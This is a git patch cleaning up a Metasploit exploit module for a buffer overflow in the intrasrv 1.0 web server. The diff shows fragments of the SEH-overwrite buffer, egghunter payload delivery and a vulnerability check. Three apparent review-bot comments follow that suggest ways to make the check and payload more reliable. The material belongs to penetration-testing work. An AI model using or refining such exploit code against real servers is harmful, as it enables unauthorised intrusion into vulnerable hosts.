From 7014322dfd41e691ec94202aa9032bd41d4fae3d Mon Sep 17 00:00:00 2001
From: Nathan Einwechter
Date: Mon, 12 Aug 2013 18:16:00 -0400
Subject: [PATCH] Code cleanup

---
 modules/exploits/windows/http/intrasrv_bof.rb | 15 +++++++++------
 1 file changed, 9 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index a57f9cbb61..ca082b2606 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -58,6 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
         'Privileged' => false,
         'DisclosureDate' => "May 30 2013",
         'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The remote port', 80])
+      ], self.class)
   end

   def check
@@ -68,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
     sock.put("GET / HTTP/1.0\r\n")
-    res = sock.get
+    res = sock.get_once

     if res =~ /intrasrv 1.0/
       return Exploit::CheckCode::Vulnerable
@@ -90,18 +95,16 @@ class Metasploit3 < Msf::Exploit::Remote
     buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
     buf << [target.ret].pack("V*") # seh

-    # Setup payload
-    shellcode = egg
-    # second last byte of payload gets corrupted - pad 2 bytes
+    # second last byte of payload/egg gets corrupted - pad 2 bytes
     # so we don't corrupt the actual payload
-    shellcode << rand_text(2)
+    egg << rand_text(2)

     print_status("Sending buffer...")
     # Payload location is an issue, so we're using the tcp mixin
     # instead of HttpClient here to maximize control over what's sent.
     # (i.e. no additional headers to mess with the stack)
     connect
-    sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+    sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}")
     disconnect
   end
 end
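Review bot: The RPORT registration added in the first hunk hand-rolls `OptPort.new('RPORT', [true, 'The remote port', 80])` where the framework helper `Opt::RPORT(80)` produces the same option with the conventional description and is what Tcp-mixin modules normally use, so `Opt::RPORT(80)` would read more consistently. A default is needed here because, as the comment later in the file says, the module talks raw TCP rather than going through HttpClient, which is worth stating next to the option: `# Raw Tcp mixin (no HttpClient), so supply the HTTP default port ourselves`. The enclosing initialize method starts outside the hunk.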
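Review bot: The probe sent by check in the second hunk, `GET / HTTP/1.0\r\n`, stops after the request line without the empty line that terminates an HTTP/1.0 request, so a server that waits for the end of the headers may never reply; the new `get_once` then returns nil or an empty string and the banner test fails on a host that is actually vulnerable. Sending `sock.put("GET / HTTP/1.0\r\n\r\n")` removes that dependence on the server answering a partial request. The banner match `/intrasrv 1.0/` also lets `.` match any byte; `/intrasrv 1\.0/` is the stricter and intended test. check begins and ends outside the hunk, so the connect/disconnect and error handling around this read are not visible here.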
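Review bot: In the third hunk `egg << rand_text(2)` appends two unconstrained bytes after the real payload, and the pad only protects the payload if those bytes reach the target intact; if the server truncates or rewrites on any of the characters the payload is already encoded to avoid, the pad could be lost and the corrupted second-last byte would fall on the payload again. Generating the pad under the same constraints, `egg << rand_text(2, payload_badchars)`, keeps it consistent with how the payload itself was built. The `<<` mutates `egg` in place, which was already the case through the old `shellcode` alias, so this commit changes no behaviour, but a one-line comment such as `# appended in place; egg is not reused after this` would make that explicit. The exploit method starts outside the hunk, so where `buf` and `egg` are built is not visible here.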